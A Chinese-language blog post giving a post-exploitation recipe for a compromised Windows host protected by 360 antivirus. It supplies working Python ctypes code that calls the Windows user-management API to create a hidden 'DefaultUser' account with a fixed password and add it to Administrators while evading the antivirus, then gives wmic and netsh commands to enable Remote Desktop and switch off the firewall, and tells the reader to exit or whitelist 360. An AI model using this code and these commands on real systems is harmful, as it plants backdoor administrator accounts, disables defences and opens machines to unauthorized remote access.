JZTXT

python3绕过360添加用户

发布时间 2023-03-28 13:35:32作者: 1nit

1.环境说明

  • 当前具有高权限账户会话,高权限webshell之类的
  • 当前环境下有360杀毒软件
  • 重点:需要有python3环境,如果没有,通过条件1 上传python3环境

2.python编写windows-api绕过360创建用户

  • 41行 自行修改添加用户名和密码
  • 58行 username='用户名'
  • 下面代码添加的用户名为: DefaultUser,密码为 admin@1234
import ctypes
from ctypes import wintypes
from ctypes import *
import sys


USER_PRIV_GUEST = 0
USER_PRIV_USER = 1
USER_PRIV_ADMIN = 2
UF_SCRIPT = 1
UF_NORMAL_ACCOUNT = 512
LPBYTE = POINTER(c_byte)


class USER_INFO_1(ctypes.Structure):
    _fields_ = [
        (
            'usri1_name', wintypes.LPWSTR),
        (
            'usri1_password', wintypes.LPWSTR),
        (
            'usri1_password_age', wintypes.DWORD),
        (
            'usri1_priv', wintypes.DWORD),
        (
            'usri1_home_dir', wintypes.LPWSTR),
        (
            'usri1_comment', wintypes.LPWSTR),
        (
            'usri1_flags', wintypes.DWORD),
        (
            'usri1_script_path', wintypes.LPWSTR)]


class _LOCALGROUP_MEMBERS_INFO_3(ctypes.Structure):
    _fields_ = [
        (
            'lgrmi3_domainandname', wintypes.LPWSTR)]


def adduser(username='DefaultUser', password='admin@1234'):
    ui = USER_INFO_1()
    ui.usri1_name = username
    ui.usri1_password = password
    ui.usri1_priv = USER_PRIV_USER
    ui.usri1_home_dir = None
    ui.usri1_comment = None
    ui.usri1_flags = UF_SCRIPT
    ui.usri1_script_path = None
    a = ctypes.windll.Netapi32.NetUserAdd(None, 1, ui, None)
    if a == 0:
        print("tambah pengguna success : nama={} kata laluan={}".format(username,password))
    else:
        print('tambah pengguna pengguna ralat')
    return


def addgroup(username='DefaultUser', groupname='Administrators'):
    name = _LOCALGROUP_MEMBERS_INFO_3()
    name.lgrmi3_domainandname = username
    ctypes.windll.Netapi32.NetLocalGroupAddMembers.argtypes = (
        wintypes.LPCWSTR, wintypes.LPCWSTR, wintypes.DWORD, LPBYTE, wintypes.DWORD)
    b = ctypes.windll.Netapi32.NetLocalGroupAddMembers(None, groupname,3, LPBYTE(name),1)
    if b == 0:
        print("Tambah ke kumpulan success : nama={} kumpulan={}".format(username,groupname))
    else:
        print('Tambah ke kumpulan ralat')
    return


def main():
    if len(sys.argv) == 1:
        adduser()
        addgroup()
    elif len(sys.argv) == 3:
        adduser(str(sys.argv[1]), str(sys.argv[2]))
        addgroup(str(sys.argv[1]))
    elif len(sys.argv) == 4:
        adduser(str(sys.argv[1]), str(sys.argv[2]))
        addgroup(str(sys.argv[1]), str(sys.argv[3]))
    else:
        print('usage: {} username password').format(sys.argv[1])
        print('usage: {} username password groupname').format(sys.argv[1])


if __name__ == '__main__':
    main()

3.开启3389

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

4.关闭防火墙

netsh advfirewall set allprofiles state off
netsh firewall set opmode mode=ENABLE       // 较旧的Windows版本 – XP / Server 2003

5.远程连接

  • DefaultUser:admin@1234 远程连接
  • 退出360,如果退出360权限不够,就加白名单